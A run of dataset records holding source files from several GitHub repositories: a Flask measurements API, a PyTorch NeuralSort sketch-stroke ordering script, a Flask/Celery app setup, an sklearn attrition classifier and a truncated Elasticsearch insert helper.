jsonify(mediciones)\r\n\r\n\"\"\"\r\n@app.route('mediciones/', methods=['DELETE'])\r\ndef deleteOne(fecha):\r\n x = False\r\n for medicion in mediciones:\r\n if (fecha in medicion['fecha']):\r\n x = True\r\n mediciones.remove(medicion)\r\n return 'Eliminado' if x else \"No Encontrado\"\r\n\r\n\r\n@app.route('/mediciones/', methods=['PUT'])\r\ndef putOne(fecha):\r\n body = request.json\r\n x = False\r\n for medicion in mediciones:\r\n if(fecha in medicion['fecha']):\r\n x = True\r\n medicion['valor'] = body['valor']\r\n return 'Modificado' if x else 'No Encontrado'\r\n\"\"\" \r\n\r\n@app.route('/mediciones/moda', methods = ['GET'])\r\ndef getModa():\r\n moda = []\r\n x = 0\r\n for medicion in mediciones:\r\n moda.append(medicion['valor'])\r\n \r\n x = stats.mode(moda)\r\n return jsonify(x)\r\n\r\n \r\n\r\n\r\napp.run(port=5000, debug=True)\r\n\r\n\r\n", "repo_name": "jflondonog/ProyectoIntegrador1", "sub_path": "EverGreen.py", "file_name": "EverGreen.py", "file_ext": "py", "file_size_in_byte": 2471, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 38, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 42, "usage_type": "call"}, {"api_name": "statistics.mode", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "70806160808", "text": "import torch, os, random, numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.nn.utils.rnn import pad_sequence, pack_padded_sequence\nfrom torch.utils import tensorboard as tb\n\nfrom quickdraw.quickdraw import QuickDraw\nfrom models import Embedder, ScoreFunction, SketchANet\nfrom utils import rasterize, incr_ratserize, prerender_stroke, accept_withinfg_strokes, permuter\nfrom utils import listofindex, subset\nfrom npz import NPZWriter, MetricWriter\n\ndef analyse(embedder, perm, savefile, device, n_strokes):\n # create visualizations of the model prediction\n\n p_eye = torch.eye(n_strokes, device=device) # for input-order\n \n figtest, axtest = plt.subplots(n_strokes, 4)\n figtest.set_figheight(10)\n figtest.set_figwidth(10)\n\n for q, p in enumerate([p_eye, perm]): # 'perm' is the permutation from the model\n perms = []\n for i in range(1, n_strokes + 1):\n p_ = p[:i]\n perms.append( embedder.sandwitch(perm=p_) )\n all_perms = torch.cat(perms, 0)\n preds = embedder.encoder(all_perms, feature=False)\n preds = torch.softmax(preds, 1)\n\n for i in range(n_strokes):\n img = all_perms[i,...].squeeze().cpu().numpy()\n pred = preds[i,...].squeeze().cpu().numpy()\n axtest[i,0 if q==0 else 2].imshow(img)\n axtest[i,0 if q==0 else 2].axis('off')\n axtest[i,1 if q==0 else 3].stem(pred, use_line_collection=True)\n axtest[i,1 if q==0 else 3].axis('off')\n\n axtest[0,0].set_title('Original Order')\n axtest[0,1].set_title('Classif. score')\n axtest[0,2].set_title('Model output')\n axtest[0,3].set_title('Classif. score')\n\n figtest.savefig(savefile)\n plt.close(figtest)\n\ndef deterministic_neural_sort(s, tau):\n device = s.device # Detect the device type of the score 's'\n \n n = s.size()[1]\n one = torch.ones((n, 1), device=device)\n A_s = torch.abs(s - s.permute(0, 2, 1))\n B = torch.matmul(A_s, torch.matmul(one, torch.transpose(one, 0, 1)))\n scaling = (n + 1 - 2 * (torch.arange(n, dtype=s.dtype, device=device) + 1))\n C = torch.matmul(s, scaling.unsqueeze(0))\n P_max = (C-B).permute(0, 2, 1)\n sm = torch.nn.Softmax(-1)\n P_hat = sm(P_max / tau)\n \n return P_hat\n\ndef stochastic_neural_sort(s, tau):\n ''' The core NeuralSort algorithm '''\n\n def sample_gumbel(samples_shape, device, dtype=torch.float32, eps = 1e-10):\n U = torch.rand(samples_shape, device=device, dtype=dtype)\n return -torch.log(-torch.log(U + eps) + eps)\n \n batch_size, n, _ = s.size()\n log_s_perturb = torch.log(s) + sample_gumbel([batch_size, n, 1], s.device, s.dtype)\n log_s_perturb = log_s_perturb.view(batch_size, n, 1)\n P_hat = deterministic_neural_sort(log_s_perturb, tau)\n P_hat = P_hat.view(batch_size, n, n)\n \n return P_hat\n\ndef greedy(stroke_list, classifier, label, fig, device):\n perm_stroke_list = []\n perm_stroke_idx_list = []\n for _ in range(len(stroke_list)):\n best_score = 0.0\n best_stroke = None\n best_stroke_idx = None\n for i_stroke, stroke in enumerate(stroke_list):\n if i_stroke not in perm_stroke_idx_list:\n R = torch.tensor(rasterize([*perm_stroke_list, stroke], fig), device=device).unsqueeze(0).unsqueeze(0)\n acc = torch.softmax(classifier(R).squeeze(), 0)\n if acc[label] > best_score:\n best_score = acc[label]\n best_stroke = stroke\n best_stroke_idx = i_stroke\n perm_stroke_list.append(best_stroke)\n perm_stroke_idx_list.append(best_stroke_idx)\n return perm_stroke_list\n\n\ndef main( args ):\n all_classes = [ 'book', 'cat', 'chandelier', 'computer', 'cruise ship', 'face', 'flower', 'pineapple', 'sun',\n 'bicycle', 'binoculars', 'birthday cake', 'guitar', 'windmill', 'piano', 'calculator', 'cow',\n 'truck', 'butterfly', 'mosquito' ]\n \n clf_classes = subset(all_classes, args.clf_classes)\n sort_classes = subset(all_classes, args.sort_classes)\n label_map = {}\n for si, s in enumerate(sort_classes):\n label_map[si] = clf_classes.index(s)\n\n qd = QuickDraw(args.root, categories=sort_classes, npz=args.npz,\n max_sketches_each_cat=args.max_sketches_each_cat, verbose=True, normalize_xy=False,\n mode=QuickDraw.STROKESET, filter_func=lambda s: accept_withinfg_strokes(s, args.min_strokes, args.max_strokes))\n \n # qdtrain, qdtest = qd.split(0.98)\n qdltrain = qd.get_dataloader(args.batch_size)\n qdltest = qd.get_dataloader(1)\n\n writer = tb.SummaryWriter(os.path.join(args.base, 'logs', args.tag))\n \n sketchclf = SketchANet(len(clf_classes))\n if os.path.exists(os.path.join(args.base, args.embmodel)):\n sketchclf.load_state_dict(torch.load(os.path.join(args.base, args.embmodel)))\n else:\n raise FileNotFoundError('args.embmodel not found')\n\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n # score function\n score = ScoreFunction(args.embdim + args.embdim)\n score = score.to(device)\n score_model_path = os.path.join(args.base, args.modelname)\n if os.path.exists(score_model_path):\n score.load_state_dict(torch.load(score_model_path))\n skip_train = True\n print('model found; skipping training')\n else:\n skip_train = False\n \n sketchclf = sketchclf.to(device)\n sketchclf.eval() # just as a guiding signal\n\n # loss function\n xentropy = torch.nn.CrossEntropyLoss()\n\n # optimizer\n optim = torch.optim.Adam(score.parameters(), lr=args.lr)\n # sched = torch.optim.lr_scheduler.StepLR(optim, step_size=1, gamma=0.75)\n canvas = plt.figure(frameon=False, figsize=(2.25, 2.25))\n\n count = 0\n\n for e in range(args.epochs):\n \n ####### The NPZ Writer\n if args.producenpz:\n npzwriter = NPZWriter(os.path.join(args.base, f'e{e}_' + args.npzfile))\n ####### The Metric Writer\n if args.metric:\n metricwriter = MetricWriter(os.path.join(args.base, f'e{e}_' + args.metricfile))\n \n score.train()\n for iteration, B in enumerate(qdltrain):\n if skip_train:\n break\n try:\n with torch.autograd.detect_anomaly():\n all_preds, all_labels = [], []\n for stroke_list, label in B:\n random.shuffle(stroke_list) # randomize the stroke order\n label = label_map[label] # label mapping\n\n # separate stroke-count for separate samples;\n # this is no longer provided by user\n n_strokes = len(stroke_list)\n\n raster_strokes = prerender_stroke(stroke_list, canvas)\n if torch.cuda.is_available():\n raster_strokes = raster_strokes.cuda()\n\n embedder = Embedder(sketchclf, raster_strokes, device=device)\n aug = embedder.get_aug_embeddings()\n\n scores = score(aug)\n \n p_relaxed = stochastic_neural_sort(scores.unsqueeze(0), 1 / (1 + e**0.5))\n p_discrete = torch.zeros((1, n_strokes, n_strokes), dtype=torch.float32, device=device)\n p_discrete[torch.arange(1, device=device).view(-1, 1).repeat(1, n_strokes),\n torch.arange(n_strokes, device=device).view(1, -1).repeat(1, 1),\n torch.argmax(p_relaxed, dim=-1)] = 1\n \n # permutation matrix\n p = p_relaxed + p_discrete.detach() - p_relaxed.detach() # ST Gradient Estimator\n p = p.squeeze()\n\n perms = []\n for i in range(1, n_strokes + 1):\n p_ = p[:i]\n perms.append( embedder.sandwitch(perm=p_) )\n\n all_perms = torch.cat(perms, 0)\n preds = sketchclf(all_perms, feature=False) # as a classifier\n\n all_labels.append( torch.tensor(label, device=device).repeat(n_strokes) )\n all_preds.append(preds)\n\n all_preds = torch.cat(all_preds, dim=0)\n all_labels = torch.cat(all_labels, dim=0).flatten()\n \n loss = xentropy(all_preds, all_labels)\n\n if iteration % args.interval == 0:\n print(f'[Training] [{iteration}/{e}/{args.epochs}] -> Loss: {loss}')\n writer.add_scalar('Train loss', loss.item(), count)\n count += 1\n \n optim.zero_grad()\n loss.backward()\n optim.step()\n except:\n continue\n\n if not skip_train:\n torch.save(score.state_dict(), score_model_path)\n print('[Saved] {}'.format(args.modelname))\n else:\n print('[Saved] {}'.format('Skiped trained; saving not required'))\n\n # Evaluation time\n score.eval()\n with torch.no_grad():\n total, correct = 0, 0\n\n for i_batch, B in enumerate(qdltest):\n i_sample = i_batch\n\n stroke_list, label = B[0] # Just one sample in batch\n label = label_map[label] # label mapping\n\n # random.shuffle(stroke_list)\n\n # separate stroke-count for separate samples;\n # this is no longer provided by user\n n_strokes = len(stroke_list)\n\n raster_strokes = prerender_stroke(stroke_list, canvas)\n if torch.cuda.is_available():\n raster_strokes = raster_strokes.cuda()\n\n embedder = Embedder(sketchclf, raster_strokes, device=device)\n \n aug = embedder.get_aug_embeddings()\n scores = score(aug)\n \n p_relaxed = stochastic_neural_sort(scores.unsqueeze(0), 1 / (1 + e**0.5))\n p_discrete = torch.zeros((1, n_strokes, n_strokes), dtype=torch.float32, device=device)\n p_discrete[torch.arange(1, device=device).view(-1, 1).repeat(1, n_strokes),\n torch.arange(n_strokes, device=device).view(1, -1).repeat(1, 1),\n torch.argmax(p_relaxed, dim=-1)] = 1\n \n # permutation matrix\n p = p_relaxed + p_discrete.detach() - p_relaxed.detach() # ST Gradient Estimator\n p = p.squeeze()\n\n perm_stroke_list = permuter(stroke_list, p.argmax(1))\n\n if (i_sample < args.n_viz) and args.viz:\n savefile = os.path.join(args.base, 'logs', args.modelname + '_' + str(i_sample) + '.png')\n analyse(embedder, p, savefile, device, n_strokes)\n\n # prepare for writing\n if args.producenpz:\n npzwriter.add(perm_stroke_list)\n if i_sample % 500 == 0:\n npzwriter.flush()\n\n if args.metric and (i_sample < args.n_metric):\n rand_stroke_list = permuter(stroke_list, np.random.permutation(n_strokes).tolist())\n orig_stroke_list = stroke_list\n gred_stroke_list = greedy(stroke_list, sketchclf, label, canvas, device)\n\n rand_incr_rasters = incr_ratserize(rand_stroke_list, canvas)\n orig_incr_rasters = incr_ratserize(orig_stroke_list, canvas)\n perm_incr_rasters = incr_ratserize(perm_stroke_list, canvas)\n gred_incr_rasters = incr_ratserize(gred_stroke_list, canvas)\n\n if torch.cuda.is_available():\n rand_incr_rasters = rand_incr_rasters.cuda()\n orig_incr_rasters = orig_incr_rasters.cuda()\n perm_incr_rasters = perm_incr_rasters.cuda()\n gred_incr_rasters = gred_incr_rasters.cuda()\n\n rand = torch.softmax(sketchclf(rand_incr_rasters), 1)\n orig = torch.softmax(sketchclf(orig_incr_rasters), 1)\n pred = torch.softmax(sketchclf(perm_incr_rasters), 1)\n gred = torch.softmax(sketchclf(gred_incr_rasters), 1)\n metricwriter.add(rand[:,label].unsqueeze(1).cpu().numpy(),\n orig[:,label].unsqueeze(1).cpu().numpy(),\n pred[:,label].unsqueeze(1).cpu().numpy(),\n gred[:,label].unsqueeze(1).cpu().numpy())\n print(f'{i_sample}/{args.n_metric} metric written')\n\n if i_sample % 50 == 0:\n metricwriter.flush()\n\n orig = (orig.argmax(1) == label).nonzero()\n pred = (pred.argmax(1) == label).nonzero()\n\n total += 1\n if orig.numel() == 0:\n if pred.numel() > 0:\n correct += 1\n else:\n total -= 1\n else:\n if pred.numel() > 0:\n if pred[0] <= orig[0]:\n correct += 1\n \n # print efficiency\n if args.metric:\n efficiency = float(correct) / total\n print('[Efficiency] {}/{} == {}'.format(correct, total, efficiency))\n writer.add_scalar(\"Efficiency\", efficiency, global_step=e)\n metricwriter.flush()\n\n if args.producenpz:\n npzwriter.flush()\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--base', type=str, required=False, default='.', help='base path')\n parser.add_argument('--root', type=str, required=True, help='QuickDraw folder path (containing .bin files)')\n parser.add_argument('--npz', action='store_true', help='use .npz files (if not, .bin files)')\n parser.add_argument('--max_sketches_each_cat', '-n', type=int, required=False, default=15000, help='Max no. of sketches each category')\n parser.add_argument('--embmodel', type=str, required=True, help='Embedding model (pre-trained) file')\n parser.add_argument('--embdim', type=int, required=False, default=512, help='latent dim in the embedding model')\n parser.add_argument('-b', '--batch_size', type=int, required=False, default=16, help='batch size')\n parser.add_argument('-i', '--interval', type=int, required=False, default=10, help='Logging interval')\n parser.add_argument('--lr', type=float, required=False, default=1e-4, help='Learning rate')\n parser.add_argument('-e', '--epochs', type=int, required=False, default=10, help='no. of epochs')\n parser.add_argument('-f', '--max_strokes', type=int, required=False, default=10, help='max no. of strokes')\n parser.add_argument('-g', '--min_strokes', type=int, required=False, default=7, help='min no. of strokes')\n parser.add_argument('-c', '--clf_classes', type=listofindex, required=True, help='List of class indecies in the classifier')\n parser.add_argument('-s', '--sort_classes', type=listofindex, required=True, help='List of class indecies in the neuralsort')\n parser.add_argument('-m', '--modelname', type=str, required=True, help='name of the model')\n parser.add_argument('--tag', type=str, required=True, help='a tag for recognizing model in TB')\n parser.add_argument('--viz', action='store_true', help='want visualizations?')\n parser.add_argument('--n_viz', '-z', type=int, required=False, default=25, help='How many samples to visualize')\n parser.add_argument('--n_metric', type=int, required=False, default=1000, help='How many samples to use for metric calc')\n parser.add_argument('--producenpz', action='store_true', help='want to produce .npz file ?')\n parser.add_argument('--npzfile', type=str, required=False, default='output.npz', help='NPZ file name')\n parser.add_argument('--metric', action='store_true', help='compute metric (early recog.) ?')\n parser.add_argument('--metricfile', type=str, required=False, default='metric.npz', )\n args = parser.parse_args()\n\n main( args )\n ", "repo_name": "dasayan05/neuralsort-siggraph", "sub_path": "strokesort.py", "file_name": "strokesort.py", "file_ext": "py", "file_size_in_byte": 16568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.eye", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.rand", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "utils.rasterize", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 86, "usage_type": "call"}, {"api_name": "utils.subset", "line_number": 101, "usage_type": "call"}, {"api_name": "utils.subset", "line_number": 102, "usage_type": "call"}, {"api_name": "quickdraw.quickdraw.QuickDraw", "line_number": 107, "usage_type": "call"}, {"api_name": "quickdraw.quickdraw.QuickDraw.STROKESET", "line_number": 109, "usage_type": "attribute"}, {"api_name": "quickdraw.quickdraw.QuickDraw", "line_number": 109, "usage_type": "name"}, {"api_name": "utils.accept_withinfg_strokes", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard", "line_number": 115, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "models.SketchANet", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 123, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 126, "usage_type": "call"}, {"api_name": "models.ScoreFunction", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 146, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "npz.NPZWriter", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 156, "usage_type": "call"}, {"api_name": "os.path", "line_number": 156, "usage_type": "attribute"}, {"api_name": "npz.MetricWriter", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.autograd.detect_anomaly", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 166, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 169, "usage_type": "call"}, {"api_name": "utils.prerender_stroke", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 177, "usage_type": "attribute"}, {"api_name": "models.Embedder", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 186, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 203, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 223, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 230, "usage_type": "call"}, {"api_name": "utils.prerender_stroke", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 246, "usage_type": "attribute"}, {"api_name": "models.Embedder", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 255, "usage_type": "attribute"}, {"api_name": "torch.arange", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 258, "usage_type": "call"}, {"api_name": "utils.permuter", "line_number": 264, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "attribute"}, {"api_name": "utils.permuter", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.incr_ratserize", "line_number": 281, "usage_type": "call"}, {"api_name": "utils.incr_ratserize", "line_number": 282, "usage_type": "call"}, {"api_name": "utils.incr_ratserize", "line_number": 283, "usage_type": "call"}, {"api_name": "utils.incr_ratserize", "line_number": 284, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 286, "usage_type": "attribute"}, {"api_name": "torch.softmax", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 294, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 295, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 332, "usage_type": "call"}, {"api_name": "utils.listofindex", "line_number": 345, "usage_type": "name"}, {"api_name": "utils.listofindex", "line_number": 346, "usage_type": "name"}]}
+{"seq_id": "706852684", "text": "\"\"\"app.py\"\"\"\nimport os\nimport sys\nimport logging\nfrom celery import Celery\nfrom flask import Flask\nfrom flask_mongoengine import MongoEngine\n\ndef make_celery(app):\n celery = Celery(app.import_name, backend=app.config['CELERY_BACKEND'],\n broker=app.config['CELERY_BROKER_URL'])\n celery.conf.update(app.config)\n TaskBase = celery.Task\n class ContextTask(TaskBase):\n abstract = True\n def __call__(self, *args, **kwargs):\n with app.app_context():\n return TaskBase.__call__(self, *args, **kwargs)\n celery.Task = ContextTask\n return celery\n\napp = Flask(__name__)\napp.config.from_object(os.environ['APP_SETTINGS'])\ndb = MongoEngine(app)\ncelery = make_celery(app)\n\n\nlogging.basicConfig(\n stream=app.config['LOGSTREAM'], level=app.config['LOGLEVEL'])\n\nTMP_DIR = os.environ.get('TMP_DIR', os.path.join('/tmp', 'guruserver'))\n\nfrom .api import api\n\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "uw-hai/guru-server", "sub_path": "guruserver/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 960, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "celery.Celery", "line_number": 10, "usage_type": "call"}, {"api_name": "celery.conf.update", "line_number": 12, "usage_type": "call"}, {"api_name": "celery.conf", "line_number": 12, "usage_type": "attribute"}, {"api_name": "celery.Task", "line_number": 13, "usage_type": "attribute"}, {"api_name": "celery.Task", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 22, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask_mongoengine.MongoEngine", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 28, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 31, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}]}
+{"seq_id": "42759100719", "text": "from sklearn.preprocessing import LabelEncoder\nfrom sklearn.neural_network import MLPClassifier\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\n\n\ndef analyze(data, type):\n print(data.shape)\n print(data.info())\n print(data.describe())\n print(data.head())\n print(data[type].value_counts())\n\n\ndef analyze_good_employees(data):\n averages = data.mean()\n average_last_evaluation = averages['last_evaluation']\n average_project = averages['number_project']\n average_montly_hours = averages['average_monthly_hours']\n average_time_spend = averages['time_spend_company']\n average_salary = averages['salary']\n\n good_employees = data[data['last_evaluation'] > average_last_evaluation]\n good_employees = good_employees[good_employees['number_project'] > average_project]\n good_employees = good_employees[good_employees['average_monthly_hours'] > average_montly_hours]\n good_employees = good_employees[good_employees['time_spend_company'] > average_time_spend]\n good_employees = good_employees[good_employees['salary'] > average_salary]\n\n sns.set()\n plt.figure(figsize=(15, 8))\n plt.hist(data['left'])\n print(good_employees.shape)\n sns.heatmap(good_employees.corr(), vmax=0.5, cmap=\"PiYG\")\n plt.title('Correlation matrix')\n plt.show()\n\n\ndef label_encode(data, col):\n # Transforme un type catégorie en entier\n le = LabelEncoder()\n # On récupère tous les noms de catégories possibles\n unique_values = list(data[col].unique())\n le_fitted = le.fit(unique_values)\n # On liste l'ensemble des valeurs\n values = list(data[col].values)\n # On transforme les catégories en entier\n values_transformed = le.transform(values)\n # On fait le remplacement de la colonne dans le dataframe d'origine\n data[col] = values_transformed\n #print(data)\n\n\ndef split_data(data, y):\n train, test = train_test_split(data, test_size=0.3)\n x_train = train\n y_train = train[y]\n del x_train[y]\n\n x_test = test\n y_test = test[y]\n del x_test[y]\n\n return x_train, y_train, x_test, y_test\n\n\ndef create_model(classifier, x, y):\n classifier.fit(x, y)\n return classifier\n\n\ndef display_score(classifier, x_train, y_train, x_test, y_test):\n print(\"Train score: {}, Test score {}\".format(classifier.score(x_train, y_train), classifier.score(x_test, y_test)))\n y_pred = classifier.predict(x_test)\n print(confusion_matrix(y_test, y_pred))\n\n\nif __name__ == '__main__':\n data = pd.read_csv('human_resources.csv')\n #analyze(data, 'left')\n label_encode(data, 'category')\n label_encode(data, 'salary')\n analyze_good_employees(data)\n x_train, y_train, x_test, y_test = split_data(data, 'left')\n\n classifier = create_model(MLPClassifier(), x_train, y_train)\n display_score(classifier, x_train, y_train, x_test, y_test)\n\n\n", "repo_name": "Weamix/ApprentissageArtificiel", "sub_path": "TP5-neural-network/neural_network.py", "file_name": "neural_network.py", "file_ext": "py", "file_size_in_byte": 2950, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "seaborn.set", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 43, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 88, "usage_type": "call"}]}
+{"seq_id": "18405366052", "text": "#!/usr/bin/python\n#-*- coding: utf-8 -*-\n#Edited By Sky 2017-07-24\n\n\nimport pcPython.pcGroup.util.requestUtil as requestUtil\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\n\nclass insertUtil():\n '''\n esServer : elasticsearch的服务端口,eg:192.168.12.81:9200\n index:索引名字\n type:类型\n data:json字符串数据\n '''\n def insertSingle(self , esServer , index , type , data , headers = None):\n url = \"http://%s/%s/%s\" % (esServer , index , type)\n if headers == None:\n headers = {'User-Agent':'PcGroup Util Client',\"Content-Type\" : \"application/json; charset=UTF-8\"}\n requestUtil.post( url , data , headers)\n else:\n requestUtil.post( url , data , headers )\n\n '''\n esServer : elasticsearch的服务端口,eg:192.168.12.81:9200\n index:索引名字\n type:类型\n data:列表中包含字典:[{\"ok\":1,\"ok2\":2,\"ok3\":\"ok3\"}]\n data = []\n dataDict = {\"ok\":1,\"ok2\":2,\"ok3\":\"ok3\"}\n data.append(dataDict)\n data.append(dataDict)\n '''\n def insertBluk(self , esServer , index , type , data):\n es = Elasticsearch( esServer )\n if isinstance(data,dict):\n actions = [{'_op_type': 'index', '_index': index, '_type': type, '_source': d} for d in data.itervalues()]\n else:\n actions = [{'_op_type': 'index','_index' : index ,'_type' : type , '_source':d} for d in data]\n 